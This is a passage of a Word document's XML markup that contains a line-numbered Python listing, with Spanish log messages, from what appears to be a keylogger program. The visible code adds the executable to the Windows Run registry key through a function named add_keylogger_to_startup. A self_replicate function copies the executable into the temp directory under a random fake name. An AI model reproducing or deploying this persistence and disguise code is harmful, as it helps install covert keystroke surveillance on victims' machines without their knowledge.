      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Delete temp files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1055" w:name="l708"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">708  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1055"/>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056" w:name="l709"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">709  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1056"/>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pantalla'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1057" w:name="l710"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">710  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1057"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1058" w:name="l711"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">711  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="105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w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1059" w:name="l712"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">712  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="105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shutdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1060" w:name="l713"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">713  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1060"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1061" w:name="l714"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">714  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1061"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>sys</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>exit</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062" w:name="l715"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">715  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1062"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1063" w:name="l716"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">716  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1063"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1064" w:name="l717"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">717  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1064"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Add the file to the startup registry key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1065" w:name="l718"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">718  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1065"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>add_keylogger_to_startup</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66" w:name="l719"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">719  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1066"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">exec_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67" w:name="l720"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">720  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="106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fichero ejecutable. No añado al registro.'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1068" w:name="l721"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">721  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1068"/>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1069" w:name="l722"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">722  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="106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70" w:name="l723"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">723  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="107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Añade ejecutable {} en Registro de Windows para autoejecución'</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71" w:name="l724"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">724  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1071"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">keyVal </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>r'Software\Microsoft\Windows\CurrentVersion\Run'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1072" w:name="l725"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">725  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="107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073" w:name="l726"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">726  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1073"/>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Open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KEY_ALL_ACCESS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1074" w:name="l727"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">727  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1074"/>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1075" w:name="l728"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">728  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1075"/>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Create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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1076" w:name="l729"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">729  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1076"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">exec_name </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">+= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">' -s'      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># adds start option</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1077" w:name="l730"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">730  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1077"/>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SetValueEx</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'DEK'</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REG_SZ</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </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78" w:name="l731"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">731  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1078"/>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CloseKey</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1079" w:name="l732"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">732  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1079"/>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1080" w:name="l733"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">733  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1080"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1081" w:name="l734"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">734  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1081"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1082" w:name="l735"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">735  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1082"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Replicate executable into temp directory and returns new random fake filename</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1083" w:name="l736"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">736  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1083"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Note that this is only effective with the compiled version on an .exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1084" w:name="l737"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">737  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1084"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>self_replicate</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85" w:name="l738"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">738  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1085"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">exec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86" w:name="l739"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">739  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="108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ejecutable. No replica.'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1087" w:name="l740"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">740  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1087"/>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088" w:name="l741"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">741  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1088"/>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89" w:name="l742"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">742  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1089"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">ext </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'.exe'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1090" w:name="l743"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">743  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1090"/>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exec_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)[</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">== </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>ext</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1091" w:name="l744"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">744  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1091"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">fake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ext</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>KLGPRE</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092" w:name="l745"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">745  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="109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plica ejecutable {} sobre {}'</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 xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>fake_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1093" w:name="l746"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">746  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1093"/>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exec_name</w:t>
